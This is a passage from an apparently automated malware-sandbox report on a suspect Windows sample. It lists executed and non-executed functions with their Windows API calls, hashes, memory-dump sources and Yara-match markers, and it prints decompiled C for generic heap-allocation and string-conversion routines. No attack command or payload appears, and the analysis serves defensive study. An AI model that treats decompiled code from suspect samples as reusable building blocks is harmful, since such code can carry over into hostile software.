                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: d97c37b1974dcfbfa123b6331c35943925a8d1b0f6059a6929a1283aa85219af
                                                                    • Instruction ID: 863de7f3b1b938c2d923afc35ce8ec31d35ec9007277d71e250ee6ab6b5beb63
                                                                    • Opcode Fuzzy Hash: d97c37b1974dcfbfa123b6331c35943925a8d1b0f6059a6929a1283aa85219af
                                                                    • Instruction Fuzzy Hash: C71128B58003499FDB10CF99C845BEEFBF8EB58314F10845AE554A3640D378A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051CE6D8, Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,049753E8,00000000,?), ref: 051CE73D
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: 5d2e71b804fbc46098eed100b320d5d14f0f59aba5c0b4fd387382343488dd37
                                                                    • Instruction ID: 4c70a8722c41aeedfef61408827703d4f7997316b6232a922d286f7f795263f2
                                                                    • Opcode Fuzzy Hash: 5d2e71b804fbc46098eed100b320d5d14f0f59aba5c0b4fd387382343488dd37
                                                                    • Instruction Fuzzy Hash: 061125B5C00209DFDB10CF99C986BEEBBF8EB18314F14845AE554A3650D378A644CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 049995C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0499962E
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: bac5f2a0266e24407210f5b6d23bb79e2e13f5da5a5f2a1a3bcd04a560fbca17
                                                                    • Instruction ID: 4a0305e80e37001c5a8d4978780f54fa1a7111aab05633e357302d355b202bb1
                                                                    • Opcode Fuzzy Hash: bac5f2a0266e24407210f5b6d23bb79e2e13f5da5a5f2a1a3bcd04a560fbca17
                                                                    • Instruction Fuzzy Hash: 1A11E0B6D002498FDB20CF9AD444BDEFBF8EB88314F14852AD829A7710D378A545CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051CA548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051CBCBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: f3cfe6012139cdbbe05a34b20324ca0c4acc767b22efecdfcb525f48d60f0fa9
                                                                    • Instruction ID: d7d4f3e81ba9cc9d4c59eda18aac7417ab7050c5ea2295598d28df2b2b6709bf
                                                                    • Opcode Fuzzy Hash: f3cfe6012139cdbbe05a34b20324ca0c4acc767b22efecdfcb525f48d60f0fa9
                                                                    • Instruction Fuzzy Hash: 1E1110B58042499FDB20CF99D885BDEBBF8EB58310F10885AE914A3600C375A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051C1540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051C226A,?,00000000,?), ref: 051CC435
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 53d74e14da6e854a9c3376198f8dcbe708ab4e9290ddd31782be51fa2409fa57
                                                                    • Instruction ID: fce64e12723da6cc2679bdd1ffcc330e82b7ccf3b75a487bb2b7ab851030bfc2
                                                                    • Opcode Fuzzy Hash: 53d74e14da6e854a9c3376198f8dcbe708ab4e9290ddd31782be51fa2409fa57
                                                                    • Instruction Fuzzy Hash: 7211E3B58002499FDB20CF99D845BDEBBF8EB58314F108459E969A7600D375A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051C50D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000018,00000001,?), ref: 051CD29D
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: 3dc8c0d9760eb481ea2e23d5a91cb7bc58ee70bd7199f6ba355edecac472b157
                                                                    • Instruction ID: 927b878153d8e947feaceed7fa0645fcc74085344a91176b9fe2dbd812d508d0
                                                                    • Opcode Fuzzy Hash: 3dc8c0d9760eb481ea2e23d5a91cb7bc58ee70bd7199f6ba355edecac472b157
                                                                    • Instruction Fuzzy Hash: 3A11F2B58002499FDB20CF99D985BDEFBF8EB58314F10845AE915B7600D3B5A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0499FE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0499FE9D
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 44ff59d9ca4ae7ed0a3cc2d3e6519e51c6be4d2f4125cc348f8e314f9eeb7a2c
                                                                    • Instruction ID: 920c733fb1af328a973c8771a41f18efba5442ccb20d44152f200d09976d2b37
                                                                    • Opcode Fuzzy Hash: 44ff59d9ca4ae7ed0a3cc2d3e6519e51c6be4d2f4125cc348f8e314f9eeb7a2c
                                                                    • Instruction Fuzzy Hash: 871103B58002499FDB10CF99D585BDEFBF8EB48314F24855AD859A7600C378A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051CD238, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000018,00000001,?), ref: 051CD29D
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: 4daa7a8efebe03e11ca06cb12b34933abbf96bbab057a456cfba201d2b5b8891
                                                                    • Instruction ID: 27e41ebd9f169b42a0ef75918900f53ce3f74a3bc2413a58b3cfd6bc857c420f
                                                                    • Opcode Fuzzy Hash: 4daa7a8efebe03e11ca06cb12b34933abbf96bbab057a456cfba201d2b5b8891
                                                                    • Instruction Fuzzy Hash: 4E11F2B9C002499FDB10CF99D985BDEBBF8EB18310F10885AE415B7A40D378A544CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0499FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0499FE9D
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: ffca8838aa4d0ce99145c2ee12556b1186a01bd46bc4bc2385f108fdeb8003df
                                                                    • Instruction ID: 790a630b1a94e7c7c033a5b1a0e6a8dee8c8f756bc0714800dac783899392f2f
                                                                    • Opcode Fuzzy Hash: ffca8838aa4d0ce99145c2ee12556b1186a01bd46bc4bc2385f108fdeb8003df
                                                                    • Instruction Fuzzy Hash: B81100B58002499FDB20CF9AD489BDEFBF8EB48324F10851AE818A3700C374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051CC3D0, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051C226A,?,00000000,?), ref: 051CC435
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 7451625fac3c3f7bed5ad32525b2821df1f568ec4e4078e41af4d604da8a9b2c
                                                                    • Instruction ID: 3fdbf6bec3212b826036050ec6e32c6f8fedd2e5eba28cda5fe9b7e0f2f760d7
                                                                    • Opcode Fuzzy Hash: 7451625fac3c3f7bed5ad32525b2821df1f568ec4e4078e41af4d604da8a9b2c
                                                                    • Instruction Fuzzy Hash: 511103B5C002499FDB10CF99D585BDEFBF8EB58314F14884AE469B3600D378A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051CBC59, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051CBCBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: fd106b743cfc770a871b0ca6173bee1a5cfcc8399f2afb8cafd24f8a3f514e93
                                                                    • Instruction ID: 7327a7d7dd04371b0eb23d9fe96876d54e3c145ee99e7b592427cf1404f30280
                                                                    • Opcode Fuzzy Hash: fd106b743cfc770a871b0ca6173bee1a5cfcc8399f2afb8cafd24f8a3f514e93
                                                                    • Instruction Fuzzy Hash: F71100B58042498FDB10CF99D585BDEBFF8EB58310F10885AE568A3600C378A544CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                                                                    0x00403e3d
                                                                    0x00403e43
                                                                    0x00403e49
                                                                    0x00403e7b
                                                                    0x00403e80
                                                                    0x00403e86
                                                                    0x00000000
                                                                    0x00403e86
                                                                    0x00403e4d
                                                                    0x00403e4f
                                                                    0x00403e4f
                                                                    0x00403e66
                                                                    0x00403e6f
                                                                    0x00403e77
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e57
                                                                    0x00403e59
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e5c
                                                                    0x00403e61
                                                                    0x00403e62
                                                                    0x00403e64
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e64
                                                                    0x00000000

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                    • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                                                    • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                    • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0075D2E8, Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277892150.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f62cbe0d4323cb54407f344aeb3dcfa95eb3b470af2ad97f815d74fd2af8e45f
                                                                    • Instruction ID: 602e6f66d92424d00fcf4e6a9de0916a550ce1697a78f6936361c3a50a61e229
                                                                    • Opcode Fuzzy Hash: f62cbe0d4323cb54407f344aeb3dcfa95eb3b470af2ad97f815d74fd2af8e45f
                                                                    • Instruction Fuzzy Hash: 8221D6B1504240EFDB25CF14D8C0BAABB66FB84315F248569EC050B746C37ADC1ADBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0075D5B0, Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277892150.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3a29bd5182322de87fbdb40f32388e980e562690020e841b6c2786684c0dd01
                                                                    • Instruction ID: 0557cab1c7413f1f95a7f4b264b5659fbf736224a922e1966e6a2c7fe9004dab
                                                                    • Opcode Fuzzy Hash: d3a29bd5182322de87fbdb40f32388e980e562690020e841b6c2786684c0dd01
                                                                    • Instruction Fuzzy Hash: 9F2103B1504240EFDF24DF10D8C0BA6BFA5FB98365F208569EC094B606C37ADC5ADBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0076D1D4, Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277914373.000000000076D000.00000040.00000001.sdmp, Offset: 0076D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 63a5cf0b2321639e50aad729d3192ff17031a6e4d0c922b91576f874d7f32973
                                                                    • Instruction ID: b71686523c91be0394c2b49e6d0697de41c8471e2aa4b578f48c65e03fb40f1c
                                                                    • Opcode Fuzzy Hash: 63a5cf0b2321639e50aad729d3192ff17031a6e4d0c922b91576f874d7f32973
                                                                    • Instruction Fuzzy Hash: 9F21F570A14240EFDB25CF10D9D0B26BB65FB88314F24C96DDC0A4B741C33ADC4ACAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0076D01C, Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277914373.000000000076D000.00000040.00000001.sdmp, Offset: 0076D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 984fe4a4f627aa44eb134ba96ecb9573865a9f2b7fcfce1548a0f9ef3ff30d2d
                                                                    • Instruction ID: 03f0f9917d728e7da84a062fa4aacef78e81397bb48757858aa9e5b3e3b23dd8
                                                                    • Opcode Fuzzy Hash: 984fe4a4f627aa44eb134ba96ecb9573865a9f2b7fcfce1548a0f9ef3ff30d2d
                                                                    • Instruction Fuzzy Hash: 6C21D374A04240EFCB24CF14D8C4B56BB65FB88314F24C969DC0A4B746C33ADC46CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0075D2E3, Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277892150.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f577c0d785620053450ac6b5f88a74b336517c772b60918f743648fc63ace247
                                                                    • Instruction ID: 3ee0638d5116ba4242f74ecd5ac2cd0d7c2548ce7a892bfd43a5d4ee6fafd51d
                                                                    • Opcode Fuzzy Hash: f577c0d785620053450ac6b5f88a74b336517c772b60918f743648fc63ace247
                                                                    • Instruction Fuzzy Hash: C121B476504240DFCB25CF10D9C4B56BF72FB84310F24C5A9DC444B656C33AD81ACBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0075D5AB, Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277892150.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d30635df11a0a4441337c1596a288a2e76eda72e03be72d2606ef8ea09213f5
                                                                    • Instruction ID: 6bba7741f3f816e1bdcb6f4626b0da09c6dbd4956b8e8d1bbf9be4c4f9f347d4
                                                                    • Opcode Fuzzy Hash: 8d30635df11a0a4441337c1596a288a2e76eda72e03be72d2606ef8ea09213f5
                                                                    • Instruction Fuzzy Hash: 9B11AF76404280DFDB21CF10D9C4B56BF72FB94320F24C6A9DC094B616C37AD85ACBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0076D017, Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277914373.000000000076D000.00000040.00000001.sdmp, Offset: 0076D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 368b5f16432069a8443523713166230eae48744dfbf47c59ed69e4d46d149b90
                                                                    • Instruction ID: 09be4e3098031deb01c2581d55299b438ccc108edad4d65302d314bf94b91fd5
                                                                    • Opcode Fuzzy Hash: 368b5f16432069a8443523713166230eae48744dfbf47c59ed69e4d46d149b90
                                                                    • Instruction Fuzzy Hash: C5118E75904280DFCB11CF14D5D4B15BB71FB88314F24C6AADC4A4B656C33AD84ACBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0076D1CF, Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277914373.000000000076D000.00000040.00000001.sdmp, Offset: 0076D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 368b5f16432069a8443523713166230eae48744dfbf47c59ed69e4d46d149b90
                                                                    • Instruction ID: cb955bd1700532e2d75e176025e5cf69cdea9e578b92f8a820ef83279af36755
                                                                    • Opcode Fuzzy Hash: 368b5f16432069a8443523713166230eae48744dfbf47c59ed69e4d46d149b90
                                                                    • Instruction Fuzzy Hash: 79118B75A04280DFCB21CF10D5D4B15BBB1FB84324F28C6AEDC4A4B656C33AD84ACB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0075D005, Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277892150.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 060f397f9ab4bcb0b70949f4cb0a3af670b804836c96eca66000d42d8c9b77c0
                                                                    • Instruction ID: 9d6b06fafcfaab08d5e87c3be5bdd698ff59966891a9c9df9820a7c991b2025a
                                                                    • Opcode Fuzzy Hash: 060f397f9ab4bcb0b70949f4cb0a3af670b804836c96eca66000d42d8c9b77c0
                                                                    • Instruction Fuzzy Hash: F0016D7140D3C45FE7228B218C84692BFA8DF53224F1980DBE9888F293D2AD5C49C771
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0075D01D, Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277892150.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cffb011498c8e0b55460b7d3b7b37247c0733c660f9af2e36fec4fcf939f9ab9
                                                                    • Instruction ID: f96167b57b35ebe56b06a96c916c9500d6bbc96ac96b5e8b056ee00eb4c78853
                                                                    • Opcode Fuzzy Hash: cffb011498c8e0b55460b7d3b7b37247c0733c660f9af2e36fec4fcf939f9ab9
                                                                    • Instruction Fuzzy Hash: 2701D470504384AAE7304A21C8847E2BB98EB51369F18801AED085B782C7BD9C4DC6B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 70%
                                                                    			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0xa7e2061e
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                                                                    0x004078d4
                                                                    0x004078d5
                                                                    0x004078d6
                                                                    0x004078dd
                                                                    0x004078e2
                                                                    0x004078e8
                                                                    0x004078ee
                                                                    0x004078f4
                                                                    0x004078f7
                                                                    0x004078f7
                                                                    0x004078fa
                                                                    0x004078fc
                                                                    0x004078fc
                                                                    0x004078fa
                                                                    0x004078fe
                                                                    0x00407903
                                                                    0x0040790a
                                                                    0x0040790d
                                                                    0x0040790d
                                                                    0x00407929
                                                                    0x0040792f
                                                                    0x00407934
                                                                    0x00407ac7
                                                                    0x00407ad2
                                                                    0x00407ada
                                                                    0x0040793a
                                                                    0x0040793a
                                                                    0x0040793d
                                                                    0x00407942
                                                                    0x00407946
                                                                    0x0040799a
                                                                    0x0040799a
                                                                    0x0040799c
                                                                    0x0040799e
                                                                    0x00407abc
                                                                    0x00407abc
                                                                    0x00407abe
                                                                    0x00407abf
                                                                    0x00407ac5
                                                                    0x00000000
                                                                    0x00407ac5
                                                                    0x004079af
                                                                    0x004079b5
                                                                    0x004079b7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079bd
                                                                    0x004079cf
                                                                    0x004079d4
                                                                    0x004079d8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079e5
                                                                    0x00407a1f
                                                                    0x00407a22
                                                                    0x00407a25
                                                                    0x00407a27
                                                                    0x00407a29
                                                                    0x00407a2b
                                                                    0x00407a77
                                                                    0x00407a77
                                                                    0x00407a79
                                                                    0x00407a79
                                                                    0x00407a7b
                                                                    0x00407ab5
                                                                    0x00407ab6
                                                                    0x00000000
                                                                    0x00407abb
                                                                    0x00407a8f
                                                                    0x00407a94
                                                                    0x00407a96
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a9a
                                                                    0x00407a9b
                                                                    0x00407a9c
                                                                    0x00407a9f
                                                                    0x00407adb
                                                                    0x00407ade
                                                                    0x00407aa1
                                                                    0x00407aa1
                                                                    0x00407aa2
                                                                    0x00407aa2
                                                                    0x00407aaf
                                                                    0x00407ab1
                                                                    0x00407ab3
                                                                    0x00407ae4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407ab3
                                                                    0x00407a2d
                                                                    0x00407a30
                                                                    0x00407a32
                                                                    0x00407a34
                                                                    0x00407a36
                                                                    0x00407a39
                                                                    0x00407a3e
                                                                    0x00407a59
                                                                    0x00407a5b
                                                                    0x00407a65
                                                                    0x00407a67
                                                                    0x00407a68
                                                                    0x00407a6a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a6c
                                                                    0x00407a72
                                                                    0x00407a72
                                                                    0x00000000
                                                                    0x00407a72
                                                                    0x00407a40
